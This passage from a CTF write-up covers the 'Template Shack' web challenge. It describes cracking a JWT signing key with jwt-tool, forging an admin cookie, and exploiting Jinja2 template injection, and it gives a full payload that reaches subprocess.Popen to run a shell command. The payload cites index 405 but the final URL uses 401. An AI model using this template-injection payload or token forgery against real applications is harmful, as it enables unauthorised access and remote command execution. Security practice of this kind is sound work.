Nothing out of place. Checking the cookies we see what looks to be a JSON Web Token  [jwt.io](http://jwt.io) confirms that it's a JWT and it's using HS256 as the hashing algorithm. Let's see if we can forge our own by cracking this one.  Using jwt-tool to crack the key  Time to forge our own admin JWT:  By changing the cookie value to our new JWT, we've accessed the admin account  Nothing seems to work here, and the only two options that do work kick back a 404.  Interesting. The URL that's causing the error seems to be reflected on the page. Seems like we can control it. Since the name of the challenge is 'Template Shack', let's jump right into template injection `jh2i.com:50023/admin/{{7*7}}`  Template injection is a go! Starting with `{{''.__class__.__mro__[1].__subclasses__()}}` we can look for the `'subprocess.Popen'` class  we need it's exact index in the list. Let's use slicing to find it: `{{''.__class__.__mro__[1].__subclasses__()[400::]}}` By continuously slicing higher indices, we can track down exactly where `subprocess.Popen` is `{{''.__class__.__mro__[1].__subclasses__()[405::]}}`  Now that it's at the top of the list, we know it's at 405 Payload: `{{''.__class__.__mro__[1].__subclasses__()[405]('cat flag.txt',shell=True,stdout=-1).communicate()}}` Full url: `http://jh2i.com:50023/admin/{{''.__class__.__mro__[1].__subclasses__()[401]('cat flag.txt',shell=True,stdout=-1).communicate()}}`  This article explains it \*much\* better than I ever could: [https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee](https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee) --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #ctf #ssti #jwt #web Related: